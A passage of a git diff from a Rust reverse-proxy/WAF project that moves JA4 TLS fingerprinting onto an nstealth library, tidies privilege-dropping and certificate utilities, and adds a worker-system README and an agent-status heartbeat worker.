} @@ -198,7 +225,8 @@ pub fn remove_fingerprint(peer_addr: &SocketAddr) { /// Clean up old fingerprints (older than 5 minutes) to prevent memory leaks /// This should be called periodically pub fn cleanup_old_fingerprints() { - let cutoff = SystemTime::now().checked_sub(std::time::Duration::from_secs(300)) + let cutoff = SystemTime::now() + .checked_sub(std::time::Duration::from_secs(300)) .unwrap_or(UNIX_EPOCH); if let Ok(mut map) = get_fingerprint_map().lock() { @@ -206,7 +234,11 @@ pub fn cleanup_old_fingerprints() { map.retain(|_, entry| entry.stored_at > cutoff); let removed = initial_len - map.len(); if removed > 0 { - debug!("Cleaned up {} old TLS fingerprints (kept {} active)", removed, map.len()); + debug!( + "Cleaned up {} old TLS fingerprints (kept {} active)", + removed, + map.len() + ); } } } @@ -219,6 +251,3 @@ pub fn extract_and_fingerprint( // ClientHello extraction is only supported on Unix None } - - - diff --git a/src/utils/tls_fingerprint.rs b/src/utils/tls_fingerprint.rs index a8f159e..64cce0e 100644 --- a/src/utils/tls_fingerprint.rs +++ b/src/utils/tls_fingerprint.rs @@ -1,7 +1,13 @@ +//! TLS Fingerprint compatibility layer wrapping nstealth::Ja4 +//! +//! This module provides a backward-compatible interface to the nstealth JA4 +//! fingerprinting library. + +use nstealth::{Ja4, TlsVersion as NstealthTlsVersion}; use sha2::{Digest, Sha256}; use tls_parser::{ - TlsClientHelloContents, TlsExtension, TlsExtensionType, TlsMessage, TlsMessageHandshake, - parse_tls_extensions, parse_tls_plaintext, + TlsExtension, TlsExtensionType, TlsMessage, TlsMessageHandshake, parse_tls_extensions, + parse_tls_plaintext, }; /// GREASE values as defined in RFC 8701. @@ -11,6 +17,7 @@ pub const TLS_GREASE_VALUES: [u16; 16] = [ ]; /// High level JA4 fingerprint summary derived from a TLS ClientHello. +/// This struct maintains backward compatibility with the original API. #[derive(Debug, Clone)] pub struct Fingerprint { pub ja4: String, @@ -24,257 +31,191 @@ pub struct Fingerprint { } /// Attempt to parse a TLS ClientHello from the supplied bytes and, if successful, -/// return the corresponding JA4 fingerprints. +/// return the corresponding JA4 fingerprints using nstealth. pub fn fingerprint_client_hello(data: &[u8]) -> Option { let (_, record) = parse_tls_plaintext(data).ok()?; for message in record.msg.iter() { if let TlsMessage::Handshake(TlsMessageHandshake::ClientHello(client_hello)) = message { - let signature = extract_tls_signature_from_client_hello(client_hello).ok()?; - let sorted = signature.generate_ja4_with_order(false); - let unsorted = signature.generate_ja4_with_order(true); + // Extract data from ClientHello + let cipher_suites: Vec = client_hello.ciphers.iter().map(|c| c.0).collect(); + let filtered_cipher_suites = filter_grease_values(&cipher_suites); + let preferred_cipher_suite = filtered_cipher_suites.first().copied(); + + let mut extensions = Vec::new(); + let mut sni = None; + let mut alpn = None; + let mut signature_algorithms = Vec::new(); + + if let Some(ext_data) = &client_hello.ext { + if let Ok((_remaining, parsed_extensions)) = parse_tls_extensions(ext_data) { + for extension in &parsed_extensions { + let ext_type: u16 = TlsExtensionType::from(extension).into(); + if !is_grease_value(ext_type) { + extensions.push(ext_type); + } + match extension { + TlsExtension::SNI(sni_list) => { + if let Some((_, hostname)) = sni_list.first() { + sni = String::from_utf8(hostname.to_vec()).ok(); + } + } + TlsExtension::ALPN(alpn_list) => { + if let Some(protocol) = alpn_list.first() { + alpn = String::from_utf8(protocol.to_vec()).ok(); + } + } + TlsExtension::SignatureAlgorithms(sig_algs) => { + signature_algorithms = sig_algs.clone(); + } + _ => {} + } + } + } + } + + // Determine TLS version + let version = determine_tls_version(&client_hello.version, &extensions); + + // Create nstealth Ja4 for sorted fingerprint + let ja4 = Ja4::new( + false, // TCP, not QUIC + version, + sni.is_some(), + cipher_suites.clone(), + extensions.clone(), + signature_algorithms.clone(), + alpn.clone(), + ); + + // Generate fingerprints + let ja4_sorted = ja4.fingerprint(); + let ja4_raw_sorted = ja4.fingerprint_raw(); + + // For unsorted, we need to generate without sorting + // nstealth always sorts, so we generate raw ourselves for unsorted + let ja4_unsorted = generate_unsorted_fingerprint( + &version, + sni.is_some(), + &cipher_suites, + &extensions, + &signature_algorithms, + &alpn, + true, // hashed + ); + let ja4_raw_unsorted = generate_unsorted_fingerprint( + &version, + sni.is_some(), + &cipher_suites, + &extensions, + &signature_algorithms, + &alpn, + false, // raw + ); + return Some(Fingerprint { - ja4: sorted.full.value().to_string(), - ja4_raw: sorted.raw.value().to_string(), - ja4_unsorted: unsorted.full.value().to_string(), - ja4_raw_unsorted: unsorted.raw.value().to_string(), - tls_version: signature.version.to_string(), - cipher_suite: signature.preferred_cipher_suite.map(cipher_suite_to_string), - sni: signature.sni.clone(), - alpn: signature.alpn.clone(), + ja4: ja4_sorted, + ja4_raw: ja4_raw_sorted, + ja4_unsorted, + ja4_raw_unsorted, + tls_version: version.code().to_string(), + cipher_suite: preferred_cipher_suite.map(cipher_suite_to_string), + sni, + alpn, }); } } None } -#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] -enum TlsVersion { - V1_3, - V1_2, - V1_1, - V1_0, - Ssl3_0, - #[allow(dead_code)] - Ssl2_0, - Unknown(u16), -} - -impl std::fmt::Display for TlsVersion { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - TlsVersion::V1_3 => write!(f, "13"), - TlsVersion::V1_2 => write!(f, "12"), - TlsVersion::V1_1 => write!(f, "11"), - TlsVersion::V1_0 => write!(f, "10"), - TlsVersion::Ssl3_0 => write!(f, "s3"), - TlsVersion::Ssl2_0 => write!(f, "s2"), - TlsVersion::Unknown(_) => write!(f, "00"), - } - } -} - -#[derive(Debug, Clone, PartialEq)] -enum Ja4Fingerprint { - Sorted(String), - Unsorted(String), -} - -impl Ja4Fingerprint { - fn value(&self) -> &str { - match self { - Ja4Fingerprint::Sorted(v) => v, - Ja4Fingerprint::Unsorted(v) => v, - } - } -} - -#[derive(Debug, Clone, PartialEq)] -enum Ja4RawFingerprint { - Sorted(String), - Unsorted(String), -} - -impl Ja4RawFingerprint { - fn value(&self) -> &str { - match self { - Ja4RawFingerprint::Sorted(v) => v, - Ja4RawFingerprint::Unsorted(v) => v, - } - } -} - -#[derive(Debug, Clone, PartialEq)] -struct Ja4Payload { - full: Ja4Fingerprint, - raw: Ja4RawFingerprint, -} - -#[derive(Debug, Clone, PartialEq)] -struct Signature { - version: TlsVersion, - cipher_suites: Vec, - preferred_cipher_suite: Option, - extensions: Vec, - elliptic_curves: Vec, - elliptic_curve_point_formats: Vec, - signature_algorithms: Vec, - sni: Option, - alpn: Option, -} - -impl Signature { - fn generate_ja4_with_order(&self, original_order: bool) -> Ja4Payload { - let filtered_ciphers = filter_grease_values(&self.cipher_suites); - let filtered_extensions = filter_grease_values(&self.extensions); - let filtered_sig_algs = filter_grease_values(&self.signature_algorithms); - - let protocol = "t"; - let tls_version_str = format!("{}", self.version); - let sni_indicator = if self.sni.is_some() { "d" } else { "i" }; - let cipher_count = format!("{:02}", self.cipher_suites.len().min(99)); - let extension_count = format!("{:02}", self.extensions.len().min(99)); - let (alpn_first, alpn_last) = match &self.alpn { - Some(alpn) => first_last_alpn(alpn), - None => ('0', '0'), - }; - let ja4_a = format!( - "{protocol}{tls_version_str}{sni_indicator}{cipher_count}{extension_count}{alpn_first}{alpn_last}" - ); - - let mut ciphers_for_b = filtered_ciphers; - if !original_order { - ciphers_for_b.sort_unstable(); - } - let ja4_b_raw = ciphers_for_b - .iter() - .map(|c| format!("{c:04x}")) - .collect::>() - .join(","); - - let mut extensions_for_c = filtered_extensions; - if !original_order { - extensions_for_c.retain(|&ext| ext != 0x0000 && ext != 0x0010); - extensions_for_c.sort_unstable(); - } - let extensions_str = extensions_for_c - .iter() - .map(|e| format!("{e:04x}")) - .collect::>() - .join(","); - - let sig_algs_str = filtered_sig_algs - .iter() - .map(|s| format!("{s:04x}")) - .collect::>() - .join(","); +/// Generate unsorted fingerprint (original order preserved) +fn generate_unsorted_fingerprint( + version: &NstealthTlsVersion, + has_sni: bool, + cipher_suites: &[u16], + extensions: &[u16], + signature_algorithms: &[u16], + alpn: &Option, + hashed: bool, +) -> String { + let filtered_ciphers = filter_grease_values(cipher_suites); + let filtered_extensions = filter_grease_values(extensions); + let filtered_sig_algs = filter_grease_values(signature_algorithms); + + // Part A + let protocol = "t"; + let tls_version_str = version.code(); + let sni_indicator = if has_sni { "d" } else { "i" }; + let cipher_count = format!("{:02}", filtered_ciphers.len().min(99)); + let extension_count = format!("{:02}", filtered_extensions.len().min(99)); + let (alpn_first, alpn_last) = match alpn { + Some(a) => first_last_alpn(a), + None => ('0', '0'), + }; + let part_a = format!( + "{protocol}{tls_version_str}{sni_indicator}{cipher_count}{extension_count}{alpn_first}{alpn_last}" + ); - let ja4_c_raw = if sig_algs_str.is_empty() { - extensions_str - } else if extensions_str.is_empty() { - sig_algs_str - } else { - format!("{extensions_str}_{sig_algs_str}") - }; + // Part B - ciphers in original order + let part_b_raw = filtered_ciphers + .iter() + .map(|c| format!("{c:04x}")) + .collect::>() + .join(","); - let ja4_b_hash = hash12(&ja4_b_raw); - let ja4_c_hash = hash12(&ja4_c_raw); + // Part C - extensions in original order (keep SNI and ALPN) + let extensions_str = filtered_extensions + .iter() + .map(|e| format!("{e:04x}")) + .collect::>() + .join(","); - let ja4_hashed = format!("{ja4_a}_{ja4_b_hash}_{ja4_c_hash}"); - let ja4_raw_full = format!("{ja4_a}_{ja4_b_raw}_{ja4_c_raw}"); + let sig_algs_str = filtered_sig_algs + .iter() + .map(|s| format!("{s:04x}")) + .collect::>() + .join(","); + + let part_c_raw = if sig_algs_str.is_empty() { + extensions_str + } else if extensions_str.is_empty() { + sig_algs_str + } else { + format!("{extensions_str}_{sig_algs_str}") + }; - let full = if original_order { - Ja4Fingerprint::Unsorted(ja4_hashed) + if hashed { + let part_b = if part_b_raw.is_empty() { + "000000000000".to_string() } else { - Ja4Fingerprint::Sorted(ja4_hashed) + hash12(&part_b_raw) }; - let raw = if original_order { - Ja4RawFingerprint::Unsorted(ja4_raw_full) + let part_c = if part_c_raw.is_empty() { + "000000000000".to_string() } else { - Ja4RawFingerprint::Sorted(ja4_raw_full) + hash12(&part_c_raw) }; - - Ja4Payload { full, raw } - } -} - -fn extract_tls_signature_from_client_hello( - client_hello: &TlsClientHelloContents, -) -> Result { - let cipher_suites: Vec = client_hello.ciphers.iter().map(|c| c.0).collect(); - // Filter out GREASE values before selecting preferred cipher suite - let filtered_cipher_suites = filter_grease_values(&cipher_suites); - let preferred_cipher_suite = filtered_cipher_suites.first().copied(); - - let mut extensions = Vec::new(); - let mut sni = None; - let mut alpn = None; - let mut signature_algorithms = Vec::new(); - let mut elliptic_curves = Vec::new(); - let mut elliptic_curve_point_formats = Vec::new(); - - if let Some(ext_data) = &client_hello.ext - && let Ok((_remaining, parsed_extensions)) = parse_tls_extensions(ext_data) - { - for extension in &parsed_extensions { - let ext_type: u16 = TlsExtensionType::from(extension).into(); - if !is_grease_value(ext_type) { - extensions.push(ext_type); - } - match extension { - TlsExtension::SNI(sni_list) => { - if let Some((_, hostname)) = sni_list.first() { - sni = String::from_utf8(hostname.to_vec()).ok(); - } - } - TlsExtension::ALPN(alpn_list) => { - if let Some(protocol) = alpn_list.first() { - alpn = String::from_utf8(protocol.to_vec()).ok(); - } - } - TlsExtension::SignatureAlgorithms(sig_algs) => { - signature_algorithms = sig_algs.clone(); - } - TlsExtension::EllipticCurves(curves) => { - elliptic_curves = curves.iter().map(|c| c.0).collect(); - } - TlsExtension::EcPointFormats(formats) => { - elliptic_curve_point_formats = formats.to_vec(); - } - _ => {} - } - } + format!("{part_a}_{part_b}_{part_c}") + } else { + format!("{part_a}_{part_b_raw}_{part_c_raw}") } - - let version = determine_tls_version(&client_hello.version, &extensions); - - Ok(Signature { - version, - cipher_suites, - preferred_cipher_suite, - extensions, - elliptic_curves, - elliptic_curve_point_formats, - signature_algorithms, - sni, - alpn, - }) } fn determine_tls_version( legacy_version: &tls_parser::TlsVersion, extensions: &[u16], -) -> TlsVersion { - if extensions.contains(&TlsExtensionType::SupportedVersions.into()) { - return TlsVersion::V1_3; +) -> NstealthTlsVersion { + // Check for supported_versions extension (0x002b) which indicates TLS 1.3 + if extensions.contains(&0x002b) { + return NstealthTlsVersion::Tls13; } match *legacy_version { - tls_parser::TlsVersion::Tls13 => TlsVersion::V1_3, - tls_parser::TlsVersion::Tls12 => TlsVersion::V1_2, - tls_parser::TlsVersion::Tls11 => TlsVersion::V1_1, - tls_parser::TlsVersion::Tls10 => TlsVersion::V1_0, - tls_parser::TlsVersion::Ssl30 => TlsVersion::Ssl3_0, - other => TlsVersion::Unknown(other.into()), + tls_parser::TlsVersion::Tls13 => NstealthTlsVersion::Tls13, + tls_parser::TlsVersion::Tls12 => NstealthTlsVersion::Tls12, + tls_parser::TlsVersion::Tls11 => NstealthTlsVersion::Tls11, + tls_parser::TlsVersion::Tls10 => NstealthTlsVersion::Tls10, + tls_parser::TlsVersion::Ssl30 => NstealthTlsVersion::Ssl30, + other => NstealthTlsVersion::Unknown(other.into()), } } diff --git a/src/utils/tools.rs b/src/utils/tools.rs index ee3e3fe..21ba96e 100644 --- a/src/utils/tools.rs +++ b/src/utils/tools.rs @@ -3,7 +3,7 @@ use crate::utils::tls; use crate::utils::tls::CertificateConfig; use dashmap::DashMap; use log::{debug, error, info, warn}; -use notify::{event::ModifyKind, Config, EventKind, RecommendedWatcher, RecursiveMode, Watcher}; +use notify::{Config, EventKind, RecommendedWatcher, RecursiveMode, Watcher, event::ModifyKind}; use port_check::is_port_reachable; use privdrop::PrivDrop; use sha2::{Digest, Sha256}; @@ -13,7 +13,7 @@ use std::net::SocketAddr; use std::os::unix::fs::MetadataExt; use std::str::FromStr; use std::sync::atomic::AtomicUsize; -use std::sync::mpsc::{channel, Sender}; +use std::sync::mpsc::{Sender, channel}; use std::time::{Duration, Instant}; use std::{fs, process, thread, time}; @@ -21,13 +21,13 @@ use std::{fs, process, thread, time}; pub fn print_upstreams(upstreams: &UpstreamsDashMap) { for host_entry in upstreams.iter() { let hostname = host_entry.key(); - println!("Hostname: {}", hostname); + debug!("Hostname: {}", hostname); for path_entry in host_entry.value().iter() { let path = path_entry.key(); - println!(" Path: {}", path); + debug!(" Path: {}", path); for f in path_entry.value().0.clone() { - println!( + debug!( " IP: {}, Port: {}, SSL: {}, H2: {}, HTTPS Proxy Enabled: {}, Rate Limit: {}", f.address, f.port, @@ -41,7 +41,6 @@ pub fn print_upstreams(upstreams: &UpstreamsDashMap) { } } - pub fn clone_dashmap(original: &UpstreamsDashMap) -> UpstreamsDashMap { let new_map: UpstreamsDashMap = DashMap::new(); @@ -114,7 +113,10 @@ pub fn compare_dashmaps(map1: &UpstreamsDashMap, map2: &UpstreamsDashMap) -> boo true } -pub fn merge_headers(target: &DashMap>, source: &DashMap>) { +pub fn merge_headers( + target: &DashMap>, + source: &DashMap>, +) { for entry in source.iter() { let global_key = entry.key().clone(); let global_values = entry.value().clone(); @@ -149,6 +151,11 @@ pub fn clone_idmap_into(original: &UpstreamsDashMap, cloned: &UpstreamsIdMap) { rate_limit: None, healthcheck: None, disable_access_log: false, + connection_timeout: x.connection_timeout, + read_timeout: x.read_timeout, + write_timeout: x.write_timeout, + idle_timeout: x.idle_timeout, + weight: x.weight, }; cloned.insert(id, to_add); cloned.insert(hh, x.to_owned()); @@ -181,7 +188,10 @@ pub fn listdir(dir: String) -> Vec { }; certificate_configs.push(y); } else { - debug!("Skipping certificate {} - key file does not exist yet", name); + debug!( + "Skipping certificate {} - key file does not exist yet", + name + ); } } } @@ -209,7 +219,9 @@ pub fn watch_folder(path: String, sender: Sender>) -> not loop { match rx.recv_timeout(Duration::from_secs(1)) { Ok(Ok(event)) => match &event.kind { - EventKind::Modify(ModifyKind::Data(_)) | EventKind::Create(_) | EventKind::Remove(_) => { + EventKind::Modify(ModifyKind::Data(_)) + | EventKind::Create(_) + | EventKind::Remove(_) => { if start.elapsed() > Duration::from_secs(1) { start = Instant::now(); // Add a small delay to allow both .crt and .key files to be written @@ -222,7 +234,7 @@ pub fn watch_folder(path: String, sender: Sender>) -> not } _ => {} }, - Ok(Err(e)) => error!("Watch error: {:?}", e), + Ok(Err(e)) => error!("Watch error for '{}': {:?}", path, e), Err(_) => {} } } @@ -236,7 +248,7 @@ pub fn drop_priv(user: String, group: String, http_addr: String, tls_addr: Optio break; } } - if let Some(tls_addr) = tls_addr { + if let Some(ref tls_addr) = tls_addr { loop { thread::sleep(time::Duration::from_millis(10)); if is_port_reachable(tls_addr.clone()) { @@ -245,8 +257,11 @@ pub fn drop_priv(user: String, group: String, http_addr: String, tls_addr: Optio } } info!("Dropping ROOT privileges to: {}:{}", user, group); - if let Err(e) = PrivDrop::default().user(user).group(group).apply() { - error!("Failed to drop privileges: {}", e); + if let Err(e) = PrivDrop::default().user(&user).group(&group).apply() { + error!( + "Failed to drop privileges to user='{}', group='{}' (http_addr='{}', tls_addr={:?}): {}", + user, group, http_addr, tls_addr, e + ); process::exit(1) } } @@ -259,17 +274,32 @@ pub fn check_priv(addr: &str) { let port = match SocketAddr::from_str(addr).map(|sa| sa.port()) { Ok(p) => p, - Err(_) => { - warn!("Invalid socket address '{}', skipping privilege check", addr); + Err(e) => { + warn!( + "Invalid socket address '{}', skipping privilege check: {}", + addr, e + ); return; } }; match port < 1024 { true => { - let meta = std::fs::metadata("/proc/self").map(|m| m.uid()).unwrap(); - if meta != 0 { - error!("Running on privileged port requires to start as ROOT"); + let uid = match std::fs::metadata("/proc/self").map(|m| m.uid()) { + Ok(uid) => uid, + Err(e) => { + error!( + "Failed to read /proc/self metadata for privilege check (addr='{}'): {}", + addr, e + ); + process::exit(1) + } + }; + if uid != 0 { + error!( + "Privileged port {} on '{}' requires root (current uid={})", + port, addr, uid + ); process::exit(1) } } diff --git a/src/waf/actions/block.rs b/src/waf/actions/block.rs deleted file mode 100644 index e69de29..0000000 diff --git a/src/waf/actions/mod.rs b/src/waf/actions/mod.rs deleted file mode 100644 index fabe28f..0000000 --- a/src/waf/actions/mod.rs +++ /dev/null @@ -1,2 +0,0 @@ -pub mod captcha; -pub mod block; diff --git a/src/worker/README.md b/src/worker/README.md new file mode 100644 index 0000000..502ee39 --- /dev/null +++ b/src/worker/README.md @@ -0,0 +1,294 @@ +# Worker System + +This module provides a standardized way to run background tasks in the application. + +## Overview + +Workers are long-running background tasks that perform periodic or event-driven work. The worker system provides: + +- **Lifecycle management**: Automatic startup, shutdown, and graceful termination +- **Shutdown coordination**: All workers respond to a shared shutdown signal +- **Registration**: Central `WorkerManager` for tracking and managing workers + +## Quick Start + +### Option 1: PeriodicTask Trait (Recommended) + +For simple interval-based tasks, implement the `PeriodicTask` trait: + +```rust +use crate::worker::{PeriodicTask, PeriodicWorker, PeriodicResult, BoxFuture}; + +struct MyTask { + api_url: String, +} + +impl PeriodicTask for MyTask { + fn name(&self) -> &str { + "my_task" + } + + fn interval_secs(&self) -> u64 { + 60 // Run every 60 seconds + } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + Box::pin(async move { + // Your periodic work here + println!("Doing work with {}", self.api_url); + Ok(()) + }) + } +} + +// Register with WorkerManager +let task = MyTask { api_url: "https://api.example.com".into() }; +let worker = PeriodicWorker::new(task); +manager.register_worker( + WorkerConfig { name: "my_task".into(), interval_secs: 60, enabled: true }, + worker, +)?; +``` + +### Option 2: PeriodicWorkerBuilder (For Inline Tasks) + +For quick inline tasks without a dedicated struct: + +```rust +use crate::worker::{PeriodicWorkerBuilder, WorkerConfig}; + +let worker = PeriodicWorkerBuilder::new("cleanup_task", 300) + .on_tick(|_| Box::pin(async move { + // Cleanup logic here + Ok(()) + })) + .build(); + +manager.register_worker( + WorkerConfig { name: "cleanup_task".into(), interval_secs: 300, enabled: true }, + worker, +)?; +``` + +### Option 3: Worker Trait (For Complex Workers) + +For workers that need full control (event-driven, multiple intervals, etc.): + +```rust +use crate::worker::Worker; +use tokio::sync::watch; +use tokio::task::JoinHandle; + +struct ComplexWorker { /* ... */ } + +impl Worker for ComplexWorker { + fn name(&self) -> &str { + "complex_worker" + } + + fn run(&self, mut shutdown: watch::Receiver) -> JoinHandle<()> { + tokio::spawn(async move { + loop { + tokio::select! { + _ = shutdown.changed() => { + if *shutdown.borrow() { + break; + } + } + // Your custom logic here + } + } + }) + } +} +``` + +## PeriodicTask Trait Methods + +| Method | Required | Description | +|--------|----------|-------------| +| `name()` | Yes | Worker name for logging | +| `interval_secs()` | Yes | Seconds between executions | +| `execute()` | Yes | The periodic work to perform | +| `on_startup()` | No | Called once before first tick (default: calls `execute()`) | +| `on_shutdown()` | No | Called on shutdown for cleanup (default: no-op) | +| `log_success()` | No | Log successful executions at debug level (default: `true`) | +| `missed_tick_behavior()` | No | How to handle missed ticks (default: `Delay`) | + +## PeriodicWorkerBuilder Methods + +```rust +PeriodicWorkerBuilder::new("name", interval_secs) + .with_state(shared_state) // Add shared state passed to callbacks + .on_startup(|s| ...) // Called once at startup + .on_tick(|s| ...) // Called on each interval (required) + .on_shutdown(|s| ...) // Called on shutdown + .log_success(false) // Disable success logging (for high-frequency tasks) + .missed_tick_behavior(Skip) // Skip missed ticks instead of catching up + .build() +``` + +## Lifecycle + +1. **Registration**: Worker is registered with `WorkerManager` +2. **Startup**: `on_startup()` is called once +3. **Execution**: `execute()` is called on each interval tick +4. **Shutdown**: When shutdown signal received, `on_shutdown()` is called +5. **Termination**: Worker task completes + +``` +┌─────────────┐ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ +│ Register │────▶│ Startup │────▶│ Execute │────▶│ Shutdown │ +│ │ │ (once) │ │ (periodic) │ │ (cleanup) │ +└─────────────┘ └─────────────┘ └──────┬──────┘ └─────────────┘ + │ + ▼ + ┌─────────────┐ + │ Wait │ + │ interval │ + └──────┬──────┘ + │ + └──────────────────┐ + │ + (loop back) +``` + +## Error Handling + +- Errors from `execute()` are logged as warnings but don't stop the worker +- The worker continues running and will retry on the next interval +- Use `on_shutdown()` to persist failed work or perform cleanup + +## Example: MMDB Sync Worker (Real Implementation) + +See `threat_mmdb.rs` and `geoip_mmdb.rs` for real implementations. Here's a simplified version: + +```rust +use std::sync::RwLock; + +/// Configuration for the MMDB worker +#[derive(Clone)] +pub struct MmdbConfig { + pub base_url: String, + pub mmdb_path: Option, +} + +/// Periodically checks and downloads MMDB updates +pub struct MmdbTask { + interval_secs: u64, + config: MmdbConfig, + current_version: RwLock>, // Thread-safe version tracking +} + +impl MmdbTask { + pub fn new(interval_secs: u64, base_url: String, mmdb_path: Option) -> Self { + Self { + interval_secs, + config: MmdbConfig { base_url, mmdb_path }, + current_version: RwLock::new(None), + } + } + + async fn do_sync(&self) -> PeriodicResult { + let current = self.current_version.read().unwrap().clone(); + + match sync_mmdb(&self.config, current.clone()).await { + Ok(new_ver) => { + if new_ver != current { + if let Ok(mut guard) = self.current_version.write() { + *guard = new_ver.clone(); + } + log::info!("MMDB updated to version {:?}", new_ver); + } + Ok(()) + } + Err(e) => Err(e.to_string().into()), + } + } +} + +impl PeriodicTask for MmdbTask { + fn name(&self) -> &str { "mmdb_sync" } + fn interval_secs(&self) -> u64 { self.interval_secs } + + fn execute(&self) -> BoxFuture<'_, PeriodicResult> { + Box::pin(async move { self.do_sync().await }) + } + + fn on_startup(&self) -> BoxFuture<'_, PeriodicResult> { + Box::pin(async move { self.do_sync().await }) + } + + fn log_success(&self) -> bool { + false // Handle our own logging for version changes + } +} + +// Legacy wrapper for backward compatibility +pub struct MmdbWorker { + inner: PeriodicWorker, +} + +impl MmdbWorker { + pub fn new(interval_secs: u64, base_url: String, mmdb_path: Option) -> Self { + let task = MmdbTask::new(interval_secs, base_url, mmdb_path); + Self { inner: PeriodicWorker::new(task) } + } +} + +impl Worker for MmdbWorker { + fn name(&self) -> &str { self.inner.name() } + fn run(&self, shutdown: watch::Receiver) -> JoinHandle<()> { + self.inner.run(shutdown) + } +} +``` + +## Existing Workers + +| Worker | Type | Pattern | Description | +|--------|------|---------|-------------| +| `ThreatMmdbWorker` | Periodic | `PeriodicTask` | Downloads threat intelligence database | +| `GeoipMmdbWorker` | Periodic | `PeriodicTask` | Downloads GeoIP databases (Country, ASN, City) | +| `ConfigWorker` | Complex | `Worker` | Fetches config from API or watches local file | +| `CertificateWorker` | Complex | `Worker` | Fetches certificates from Redis, multiple intervals | +| `LogSenderWorker` | Event-driven | `Worker` | Batches and sends access logs to API | + +### When to Use Each Pattern + +**Use `PeriodicTask`** when your worker: +- Runs the same task on a fixed interval +- Has simple startup/shutdown behavior (or same as periodic tick) +- Doesn't need multiple different intervals +- Doesn't need event-driven or channel-based processing + +**Use raw `Worker` trait** when your worker: +- Has multiple intervals (e.g., refresh every 5 min + cleanup every 6 hours) +- Is event-driven (processes events from a channel) +- Has complex modes (e.g., API mode vs file-watching mode) +- Needs custom shutdown behavior different from startup + +## Testing + +Workers can be tested by: + +1. Creating the task directly and calling `execute()`: + ```rust + let task = MyTask::new(); + task.execute().await?; + ``` + +2. Using the full worker with a test shutdown channel: + ```rust + let (shutdown_tx, shutdown_rx) = watch::channel(false); + let handle = worker.run(shutdown_rx); + + // Let it run + tokio::time::sleep(Duration::from_secs(5)).await; + + // Shutdown + shutdown_tx.send(true).unwrap(); + handle.await.unwrap(); + ``` + +See `src/worker/tests.rs` for comprehensive test examples. diff --git a/src/worker/agent_status.rs b/src/worker/agent_status.rs new file mode 100644 index 0000000..ada8ddd --- /dev/null +++ b/src/worker/agent_status.rs @@ -0,0 +1,62 @@ +use std::time::Duration; + +use tokio::sync::watch; +use tokio::time::{MissedTickBehavior, interval}; + +use crate::platform::agent_status::AgentStatusIdentity; +use crate::worker::log::{UnifiedEvent, send_event}; + +/// Agent status worker that sends register + heartbeat events. +/// +/// This piggybacks on the unified event queue (same as logs), so it should only be +/// registered when the log sender queue is initialized (i.e. log_sending is enabled). +pub struct AgentStatusWorker { + identity: AgentStatusIdentity, + interval_secs: u64, +} + +impl AgentStatusWorker { + pub fn new(identity: AgentStatusIdentity, interval_secs: u64) -> Self { + Self { + identity, + interval_secs, + } + } +} + +impl super::Worker for AgentStatusWorker { + fn name(&self) -> &str { + "agent_status" + } + + fn run(&self, mut shutdown: watch::Receiver) -> tokio::task::JoinHandle<()> { + let identity = self.identity.clone(); + let interval_secs = self.interval_secs; + let worker_name = self.name().to_string(); + + tokio::spawn(async move { + let mut tick = interval(Duration::from_secs(interval_secs)); + tick.set_missed_tick_behavior(MissedTickBehavior::Skip); + + // Initial register event + let now = chrono::Utc::now(); + send_event(UnifiedEvent::AgentStatus(identity.to_event("running", now))); + + loop { + tokio::select! { + _ = shutdown.changed() => { + if *shutdown.borrow() { + log::info!("[{}] Shutdown signal received, stopping agent status worker", worker_name); + break; + } + } + _ = tick.tick() => { + let now = chrono::Utc::now(); + send_event(UnifiedEvent::AgentStatus(identity.to_event("running", now))); + } + } + } + }) + } +} + diff --git a/src/worker/certificate.rs b/src/worker/certificate.rs index 07d3b2f..8a0662f 100644 --- a/src/worker/certificate.rs +++ b/src/worker/certificate.rs @@ -2,32 +2,37 @@ use anyhow::{Context, Result}; use std::io::Write; use std::sync::Arc; use tokio::sync::watch; -use tokio::time::{interval, Duration}; +use tokio::time::{Duration, interval}; -use crate::redis::RedisManager; +use crate::storage::redis::RedisManager; use crate::utils::tls::{CertificateConfig, Certificates}; use crate::worker::Worker; /// Calculate SHA256 hash of certificate files (fullchain + key) fn calculate_local_hash(cert_path: &std::path::Path, key_path: &std::path::Path) -> Result { - use sha2::{Sha256, Digest}; + use sha2::{Digest, Sha256}; use std::io::Read; let mut hasher = Sha256::new(); // Read and hash certificate file - let mut cert_file = std::fs::File::open(cert_path) - .context(format!("Failed to open certificate file: {}", cert_path.display()))?; + let mut cert_file = std::fs::File::open(cert_path).context(format!( + "Failed to open certificate file: {}", + cert_path.display() + ))?; let mut cert_data = Vec::new(); - cert_file.read_to_end(&mut cert_data) - .context(format!("Failed to read certificate file: {}", cert_path.display()))?; + cert_file.read_to_end(&mut cert_data).context(format!( + "Failed to read certificate file: {}", + cert_path.display() + ))?; hasher.update(&cert_data); // Read and hash key file let mut key_file = std::fs::File::open(key_path) .context(format!("Failed to open key file: {}", key_path.display()))?; let mut key_data = Vec::new(); - key_file.read_to_end(&mut key_data) + key_file + .read_to_end(&mut key_data) .context(format!("Failed to read key file: {}", key_path.display()))?; hasher.update(&key_data); @@ -42,12 +47,16 @@ fn normalize_pem_chain(chain: &str) -> String { // Ensure newline between END CERTIFICATE and BEGIN CERTIFICATE // Replace "-----END CERTIFICATE----------BEGIN CERTIFICATE-----" with proper newline - normalized = normalized.replace("-----END CERTIFICATE----------BEGIN CERTIFICATE-----", - "-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----"); + normalized = normalized.replace( + "-----END CERTIFICATE----------BEGIN CERTIFICATE-----", + "-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----", + ); // Ensure newline between END CERTIFICATE and BEGIN PRIVATE KEY (for key files) - normalized = normalized.replace("-----END CERTIFICATE----------BEGIN PRIVATE KEY-----", - "-----END CERTIFICATE-----\n-----BEGIN PRIVATE KEY-----"); + normalized = normalized.replace( + "-----END CERTIFICATE----------BEGIN PRIVATE KEY-----", + "-----END CERTIFICATE-----\n-----BEGIN PRIVATE KEY-----", + ); // Ensure file ends with newline if !normalized.ends_with('\n') { @@ -58,23 +67,30 @@ fn normalize_pem_chain(chain: &str) -> String { } /// Global certificate store for Redis-loaded certificates -static CERTIFICATE_STORE: once_cell::sync::OnceCell>>>> = once_cell::sync::OnceCell::new(); +static CERTIFICATE_STORE: once_cell::sync::OnceCell< + Arc>>>, +> = once_cell::sync::OnceCell::new(); /// Global in-memory cache for certificate hashes (domain -> 